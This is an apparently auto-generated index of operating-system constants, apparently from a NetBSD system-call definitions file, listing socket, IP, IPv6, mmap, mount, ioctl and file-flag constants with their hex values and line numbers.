IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 918) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 919) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 920) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 921) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 922) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 923) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 924) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 925) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 926) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTHDR (line 927) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 928) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 929) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 930) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 931) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 932) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 933) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 934) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 935) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 936) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 937) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 938) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 939) | IP_ADD_MEMBERSHIP = 0xc constant IP_DEFAULT_MULTICAST_LOOP (line 940) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 941) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 942) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 943) | IP_DROP_MEMBERSHIP = 0xd constant IP_EF (line 944) | IP_EF = 0x8000 constant IP_ERRORMTU (line 945) | IP_ERRORMTU = 0x15 constant IP_HDRINCL (line 946) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 947) | IP_IPSEC_POLICY = 0x16 constant IP_MAXPACKET (line 948) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 949) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 950) | IP_MF = 0x2000 constant IP_MINFRAGSIZE (line 951) | IP_MINFRAGSIZE = 0x45 constant IP_MINTTL (line 952) | IP_MINTTL = 0x18 constant IP_MSS (line 953) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 954) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 955) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 956) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 957) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 958) | IP_OPTIONS = 0x1 constant IP_PORTRANGE (line 959) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 960) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 961) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 962) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 963) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 964) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 965) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 966) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 967) | IP_RECVTTL = 0x17 constant IP_RETOPTS (line 968) | IP_RETOPTS = 0x8 constant IP_RF (line 969) | IP_RF = 0x8000 constant IP_TOS (line 970) | IP_TOS = 0x3 constant IP_TTL (line 971) | IP_TTL = 0x4 constant ISIG (line 972) | ISIG = 0x80 constant ISTRIP (line 973) | ISTRIP = 0x20 constant IXANY (line 974) | IXANY = 0x800 constant IXOFF (line 975) | IXOFF = 0x400 constant IXON (line 976) | IXON = 0x200 constant KERN_HOSTNAME (line 977) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 978) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 979) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 980) | KERN_VERSION = 0x4 constant LOCK_EX (line 981) | LOCK_EX = 0x2 constant LOCK_NB (line 982) | LOCK_NB = 0x4 constant LOCK_SH (line 983) | LOCK_SH = 0x1 constant LOCK_UN (line 984) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 985) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 986) | MADV_FREE = 0x6 constant MADV_NORMAL (line 987) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 988) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 989) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 990) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 991) | MADV_WILLNEED = 0x3 constant MAP_ALIGNMENT_16MB (line 992) | MAP_ALIGNMENT_16MB = 0x18000000 constant MAP_ALIGNMENT_1TB (line 993) | MAP_ALIGNMENT_1TB = 0x28000000 constant MAP_ALIGNMENT_256TB (line 994) | MAP_ALIGNMENT_256TB = 0x30000000 constant MAP_ALIGNMENT_4GB (line 995) | MAP_ALIGNMENT_4GB = 0x20000000 constant MAP_ALIGNMENT_64KB (line 996) | MAP_ALIGNMENT_64KB = 0x10000000 constant MAP_ALIGNMENT_64PB (line 997) | MAP_ALIGNMENT_64PB = 0x38000000 constant MAP_ALIGNMENT_MASK (line 998) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 999) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1000) | MAP_ANON = 0x1000 constant MAP_FILE (line 1001) | MAP_FILE = 0x0 constant MAP_FIXED (line 1002) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 1003) | MAP_HASSEMAPHORE = 0x200 constant MAP_INHERIT (line 1004) | MAP_INHERIT = 0x80 constant MAP_INHERIT_COPY (line 1005) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_DEFAULT (line 1006) | MAP_INHERIT_DEFAULT = 0x1 constant MAP_INHERIT_DONATE_COPY (line 1007) | MAP_INHERIT_DONATE_COPY = 0x3 constant MAP_INHERIT_NONE (line 1008) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1009) | MAP_INHERIT_SHARE = 0x0 constant MAP_NORESERVE (line 1010) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 1011) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1012) | MAP_RENAME = 0x20 constant MAP_SHARED (line 1013) | MAP_SHARED = 0x1 constant MAP_STACK (line 1014) | MAP_STACK = 0x2000 constant MAP_TRYFIXED (line 1015) | MAP_TRYFIXED = 0x400 constant MAP_WIRED (line 1016) | MAP_WIRED = 0x800 constant MCL_CURRENT (line 1017) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1018) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1019) | MNT_ASYNC = 0x40 constant MNT_BASIC_FLAGS (line 1020) | MNT_BASIC_FLAGS = 0xe782807f constant MNT_DEFEXPORTED (line 1021) | MNT_DEFEXPORTED = 0x200 constant MNT_DISCARD (line 1022) | MNT_DISCARD = 0x800000 constant MNT_EXKERB (line 1023) | MNT_EXKERB = 0x800 constant MNT_EXNORESPORT (line 1024) | MNT_EXNORESPORT = 0x8000000 constant MNT_EXPORTANON (line 1025) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1026) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1027) | MNT_EXPUBLIC = 0x10000000 constant MNT_EXRDONLY (line 1028) | MNT_EXRDONLY = 0x80 constant MNT_EXTATTR (line 1029) | MNT_EXTATTR = 0x1000000 constant MNT_FORCE (line 1030) | MNT_FORCE = 0x80000 constant MNT_GETARGS (line 1031) | MNT_GETARGS = 0x400000 constant MNT_IGNORE (line 1032) | MNT_IGNORE = 0x100000 constant MNT_LAZY (line 1033) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1034) | MNT_LOCAL = 0x1000 constant MNT_LOG (line 1035) | MNT_LOG = 0x2000000 constant MNT_NOATIME (line 1036) | MNT_NOATIME = 0x4000000 constant MNT_NOCOREDUMP (line 1037) | MNT_NOCOREDUMP = 0x8000 constant MNT_NODEV (line 1038) | MNT_NODEV = 0x10 constant MNT_NODEVMTIME (line 1039) | MNT_NODEVMTIME = 0x40000000 constant MNT_NOEXEC (line 1040) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1041) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1042) | MNT_NOWAIT = 0x2 constant MNT_OP_FLAGS (line 1043) | MNT_OP_FLAGS = 0x4d0000 constant MNT_QUOTA (line 1044) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1045) | MNT_RDONLY = 0x1 constant MNT_RELATIME (line 1046) | MNT_RELATIME = 0x20000 constant MNT_RELOAD (line 1047) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1048) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1049) | MNT_SOFTDEP = 0x80000000 constant MNT_SYMPERM (line 1050) | MNT_SYMPERM = 0x20000000 constant MNT_SYNCHRONOUS (line 1051) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1052) | MNT_UNION = 0x20 constant MNT_UPDATE (line 1053) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1054) | MNT_VISFLAGMASK = 0xff90ffff constant MNT_WAIT (line 1055) | MNT_WAIT = 0x1 constant MSG_BCAST (line 1056) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1057) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CONTROLMBUF (line 1058) | MSG_CONTROLMBUF = 0x2000000 constant MSG_CTRUNC (line 1059) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1060) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1061) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1062) | MSG_EOR = 0x8 constant MSG_IOVUSRSPACE (line 1063) | MSG_IOVUSRSPACE = 0x4000000 constant MSG_LENUSRSPACE (line 1064) | MSG_LENUSRSPACE = 0x8000000 constant MSG_MCAST (line 1065) | MSG_MCAST = 0x200 constant MSG_NAMEMBUF (line 1066) | MSG_NAMEMBUF = 0x1000000 constant MSG_NBIO (line 1067) | MSG_NBIO = 0x1000 constant MSG_NOSIGNAL (line 1068) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1069) | MSG_OOB = 0x1 constant MSG_PEEK (line 1070) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1071) | MSG_TRUNC = 0x10 constant MSG_USERFLAGS (line 1072) | MSG_USERFLAGS = 0xffffff constant MSG_WAITALL (line 1073) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1074) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1075) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1076) | MS_SYNC = 0x4 constant NAME_MAX (line 1077) | NAME_MAX = 0x1ff constant NET_RT_DUMP (line 1078) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1079) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1080) | NET_RT_IFLIST = 0x5 constant NET_RT_MAXID (line 1081) | NET_RT_MAXID = 0x6 constant NET_RT_OIFLIST (line 1082) | NET_RT_OIFLIST = 0x4 constant NET_RT_OOIFLIST (line 1083) | NET_RT_OOIFLIST = 0x3 constant NFDBITS (line 1084) | NFDBITS = 0x20 constant NOFLSH (line 1085) | NOFLSH = 0x80000000 constant NOTE_ATTRIB (line 1086) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1087) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1088) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1089) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1090) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1091) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1092) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1093) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1094) | NOTE_LOWAT = 0x1 constant NOTE_PCTRLMASK (line 1095) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1096) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1097) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1098) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1099) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1100) | NOTE_TRACKERR = 0x2 constant NOTE_WRITE (line 1101) | NOTE_WRITE = 0x2 constant OCRNL (line 1102) | OCRNL = 0x10 constant OFIOGETBMAP (line 1103) | OFIOGETBMAP = 0xc004667a constant ONLCR (line 1104) | ONLCR = 0x2 constant ONLRET (line 1105) | ONLRET = 0x40 constant ONOCR (line 1106) | ONOCR = 0x20 constant ONOEOT (line 1107) | ONOEOT = 0x8 constant OPOST (line 1108) | OPOST = 0x1 constant O_ACCMODE (line 1109) | O_ACCMODE = 0x3 constant O_ALT_IO (line 1110) | O_ALT_IO = 0x40000 constant O_APPEND (line 1111) | O_APPEND = 0x8 constant O_ASYNC (line 1112) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1113) | O_CLOEXEC = 0x400000 constant O_CREAT (line 1114) | O_CREAT = 0x200 constant O_DIRECT (line 1115) | O_DIRECT = 0x80000 constant O_DIRECTORY (line 1116) | O_DIRECTORY = 0x200000 constant O_DSYNC (line 1117) | O_DSYNC = 0x10000 constant O_EXCL (line 1118) | O_EXCL = 0x800 constant O_EXLOCK (line 1119) | O_EXLOCK = 0x20 constant O_FSYNC (line 1120) | O_FSYNC = 0x80 constant O_NDELAY (line 1121) | O_NDELAY = 0x4 constant O_NOCTTY (line 1122) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1123) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1124) | O_NONBLOCK = 0x4 constant O_NOSIGPIPE (line 1125) | O_NOSIGPIPE = 0x1000000 constant O_RDONLY (line 1126) | O_RDONLY = 0x0 constant O_RDWR (line 1127) | O_RDWR = 0x2 constant O_RSYNC (line 1128) | O_RSYNC = 0x20000 constant O_SHLOCK (line 1129) | O_SHLOCK = 0x10 constant O_SYNC (line 1130) | O_SYNC = 0x80 constant O_TRUNC (line 1131) | O_TRUNC = 0x400 constant O_WRONLY (line 1132) | O_WRONLY = 0x1 constant PARENB (line 1133) | PARENB = 0x1000 constant PARMRK (line 1134) | PARMRK = 0x8 constant PARODD (line 1135) | PARODD = 0x2000 constant PENDIN (line 1136) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1137) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1138) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1139) | PRIO_USER = 0x2 constant PRI_IOFLUSH (line 1140) | PRI_IOFLUSH = 0x7c constant PROT_EXEC (line 1141) | PROT_EXEC = 0x4 constant PROT_NONE (line 1142) | PROT_NONE = 0x0 constant PROT_READ (line 1143) | PROT_READ = 0x1 constant PROT_WRITE (line 1144) | PROT_WRITE = 0x2 constant RLIMIT_AS (line 1145) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1146) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1147) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1148) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1149) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1150) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1151) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1152) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1153) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1154) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1155) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1156) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1157) | RTAX_BRD = 0x7 constant RTAX_DST (line 1158) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1159) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1160) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1161) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1162) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1163) | RTAX_MAX = 0x9 constant RTAX_NETMASK (line 1164) | RTAX_NETMASK = 0x2 constant RTAX_TAG (line 1165) | RTAX_TAG = 0x8 constant RTA_AUTHOR (line 1166) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1167) | RTA_BRD = 0x80 constant RTA_DST (line 1168) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1169) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1170) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1171) | RTA_IFA = 0x20 constant RTA_IFP (line 1172) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1173) | RTA_NETMASK = 0x4 constant RTA_TAG (line 1174) | RTA_TAG = 0x100 constant RTF_ANNOUNCE (line 1175) | RTF_ANNOUNCE = 0x20000 constant RTF_BLACKHOLE (line 1176) | RTF_BLACKHOLE = 0x1000 constant RTF_CLONED (line 1177) | RTF_CLONED = 0x2000 constant RTF_CLONING (line 1178) | RTF_CLONING = 0x100 constant RTF_DONE (line 1179) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1180) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1181) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1182) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1183) | RTF_LLINFO = 0x400 constant RTF_MASK (line 1184) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 1185) | RTF_MODIFIED = 0x20 constant RTF_PROTO1 (line 1186) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1187) | RTF_PROTO2 = 0x4000 constant RTF_REJECT (line 1188) | RTF_REJECT = 0x8 constant RTF_SRC (line 1189) | RTF_SRC = 0x10000 constant RTF_STATIC (line 1190) | RTF_STATIC = 0x800 constant RTF_UP (line 1191) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1192) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1193) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1194) | RTM_CHANGE = 0x3 constant RTM_CHGADDR (line 1195) | RTM_CHGADDR = 0x15 constant RTM_DELADDR (line 1196) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1197) | RTM_DELETE = 0x2 constant RTM_GET (line 1198) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1199) | RTM_IEEE80211 = 0x11 constant RTM_IFANNOUNCE (line 1200) | RTM_IFANNOUNCE = 0x10 constant RTM_IFINFO (line 1201) | RTM_IFINFO = 0x14 constant RTM_LLINFO_UPD (line 1202) | RTM_LLINFO_UPD = 0x13 constant RTM_LOCK (line 1203) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1204) | RTM_LOSING = 0x5 constant RTM_MISS (line 1205) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1206) | RTM_NEWADDR = 0xc constant RTM_OIFINFO (line 1207) | RTM_OIFINFO = 0xf constant RTM_OLDADD (line 1208) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1209) | RTM_OLDDEL = 0xa constant RTM_OOIFINFO (line 1210) | RTM_OOIFINFO = 0xe constant RTM_REDIRECT (line 1211) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1212) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1213) | RTM_RTTUNIT = 0xf4240 constant RTM_SETGATE (line 1214) | RTM_SETGATE = 0x12 constant RTM_VERSION (line 1215) | RTM_VERSION = 0x4 constant RTV_EXPIRE (line 1216) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1217) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1218) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1219) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1220) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1221) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1222) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1223) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1224) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1225) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1226) | SCM_CREDS = 0x4 constant SCM_RIGHTS (line 1227) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1228) | SCM_TIMESTAMP = 0x8 constant SHUT_RD (line 1229) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1230) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1231) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1232) | SIOCADDMULTI = 0x80906931 constant SIOCADDRT (line 1233) | SIOCADDRT = 0x8038720a constant SIOCAIFADDR (line 1234) | SIOCAIFADDR = 0x8040691a constant SIOCALIFADDR (line 1235) | SIOCALIFADDR = 0x8118691c constant SIOCATMARK (line 1236) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1237) | SIOCDELMULTI = 0x80906932 constant SIOCDELRT (line 1238) | SIOCDELRT = 0x8038720b constant SIOCDIFADDR (line 1239) | SIOCDIFADDR = 0x80906919 constant SIOCDIFPHYADDR (line 1240) | SIOCDIFPHYADDR = 0x80906949 constant SIOCDLIFADDR (line 1241) | SIOCDLIFADDR = 0x8118691e constant SIOCGDRVSPEC (line 1242) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETPFSYNC (line 1243) | SIOCGETPFSYNC = 0xc09069f8 constant SIOCGETSGCNT (line 1244) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1245) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGHIWAT (line 1246) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 1247) | SIOCGIFADDR = 0xc0906921 constant SIOCGIFADDRPREF (line 1248) | SIOCGIFADDRPREF = 0xc0986920 constant SIOCGIFALIAS (line 1249) | SIOCGIFALIAS = 0xc040691b constant SIOCGIFBRDADDR (line 1250) | SIOCGIFBRDADDR = 0xc0906923 constant SIOCGIFCAP (line 1251) | SIOCGIFCAP = 0xc0206976 constant SIOCGIFCONF (line 1252) | SIOCGIFCONF = 0xc0106926 constant SIOCGIFDATA (line 1253) | SIOCGIFDATA = 0xc0986985 constant SIOCGIFDLT (line 1254) | SIOCGIFDLT = 0xc0906977 constant SIOCGIFDSTADDR (line 1255) | SIOCGIFDSTADDR = 0xc0906922 constant SIOCGIFFLAGS (line 1256) | SIOCGIFFLAGS = 0xc0906911 constant SIOCGIFGENERIC (line 1257) | SIOCGIFGENERIC = 0xc090693a constant SIOCGIFMEDIA (line 1258) | SIOCGIFMEDIA = 0xc0306936 constant SIOCGIFMETRIC (line 1259) | SIOCGIFMETRIC = 0xc0906917 constant SIOCGIFMTU (line 1260) | SIOCGIFMTU = 0xc090697e constant SIOCGIFNETMASK (line 1261) | SIOCGIFNETMASK = 0xc0906925 constant SIOCGIFPDSTADDR (line 1262) | SIOCGIFPDSTADDR = 0xc0906948 constant SIOCGIFPSRCADDR (line 1263) | SIOCGIFPSRCADDR = 0xc0906947 constant SIOCGLIFADDR (line 1264) | SIOCGLIFADDR = 0xc118691d constant SIOCGLIFPHYADDR (line 1265) | SIOCGLIFPHYADDR = 0xc118694b constant SIOCGLINKSTR (line 1266) | SIOCGLINKSTR = 0xc0286987 constant SIOCGLOWAT (line 1267) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1268) | SIOCGPGRP = 0x40047309 constant SIOCGVH (line 1269) | SIOCGVH = 0xc0906983 constant SIOCIFCREATE (line 1270) | SIOCIFCREATE = 0x8090697a constant SIOCIFDESTROY (line 1271) | SIOCIFDESTROY = 0x80906979 constant SIOCIFGCLONERS (line 1272) | SIOCIFGCLONERS = 0xc0106978 constant SIOCINITIFADDR (line 1273) | SIOCINITIFADDR = 0xc0706984 constant SIOCSDRVSPEC (line 1274) | SIOCSDRVSPEC = 0x8028697b constant SIOCSETPFSYNC (line 1275) | SIOCSETPFSYNC = 0x809069f7 constant SIOCSHIWAT (line 1276) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1277) | SIOCSIFADDR = 0x8090690c constant SIOCSIFADDRPREF (line 1278) | SIOCSIFADDRPREF = 0x8098691f constant SIOCSIFBRDADDR (line 1279) | SIOCSIFBRDADDR = 0x80906913 constant SIOCSIFCAP (line 1280) | SIOCSIFCAP = 0x80206975 constant SIOCSIFDSTADDR (line 1281) | SIOCSIFDSTADDR = 0x8090690e constant SIOCSIFFLAGS (line 1282) | SIOCSIFFLAGS = 0x80906910 constant SIOCSIFGENERIC (line 1283) | SIOCSIFGENERIC = 0x80906939 constant SIOCSIFMEDIA (line 1284) | SIOCSIFMEDIA = 0xc0906935 constant SIOCSIFMETRIC (line 1285) | SIOCSIFMETRIC = 0x80906918 constant SIOCSIFMTU (line 1286) | SIOCSIFMTU = 0x8090697f constant SIOCSIFNETMASK (line 1287) | SIOCSIFNETMASK = 0x80906916 constant SIOCSIFPHYADDR (line 1288) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSLIFPHYADDR (line 1289) | SIOCSLIFPHYADDR = 0x8118694a constant SIOCSLINKSTR (line 1290) | SIOCSLINKSTR = 0x80286988 constant SIOCSLOWAT (line 1291) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1292) | SIOCSPGRP = 0x80047308 constant SIOCSVH (line 1293) | SIOCSVH = 0xc0906982 constant SIOCZIFDATA (line 1294) | SIOCZIFDATA = 0xc0986986 constant SOCK_CLOEXEC (line 1295) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1296) | SOCK_DGRAM = 0x2 constant SOCK_FLAGS_MASK (line 1297) | SOCK_FLAGS_MASK = 0xf0000000 constant SOCK_NONBLOCK (line 1298) | SOCK_NONBLOCK = 0x20000000 constant SOCK_NOSIGPIPE (line 1299) | SOCK_NOSIGPIPE = 0x40000000 constant SOCK_RAW (line 1300) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1301) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1302) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1303) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1304) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1305) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1306) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1307) | SO_ACCEPTFILTER = 0x1000 constant SO_BROADCAST (line 1308) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1309) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1310) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1311) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1312) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1313) | SO_LINGER = 0x80 constant SO_NOHEADER (line 1314) | SO_NOHEADER = 0x100a constant SO_NOSIGPIPE (line 1315) | SO_NOSIGPIPE = 0x800 constant SO_OOBINLINE (line 1316) | SO_OOBINLINE = 0x100 constant SO_OVERFLOWED (line 1317) | SO_OVERFLOWED = 0x1009 constant SO_RCVBUF (line 1318) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1319) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1320) | SO_RCVTIMEO = 0x100c constant SO_REUSEADDR (line 1321) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1322) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 1323) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1324) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1325) | SO_SNDTIMEO = 0x100b constant SO_TIMESTAMP (line 1326) | SO_TIMESTAMP = 0x2000 constant SO_TYPE (line 1327) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1328) | SO_USELOOPBACK = 0x40 constant SYSCTL_VERSION (line 1329) | SYSCTL_VERSION = 0x1000000 constant SYSCTL_VERS_0 (line 1330) | SYSCTL_VERS_0 = 0x0 constant SYSCTL_VERS_1 (line 1331) | SYSCTL_VERS_1 = 0x1000000 constant SYSCTL_VERS_MASK (line 1332) | SYSCTL_VERS_MASK = 0xff000000 constant S_ARCH1 (line 1333) | S_ARCH1 = 0x10000 constant S_ARCH2 (line 1334) | S_ARCH2 = 0x20000 constant S_BLKSIZE (line 1335) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1336) | S_IEXEC = 0x40 constant S_IFBLK (line 1337) | S_IFBLK = 0x6000 constant S_IFCHR (line 1338) | S_IFCHR = 0x2000 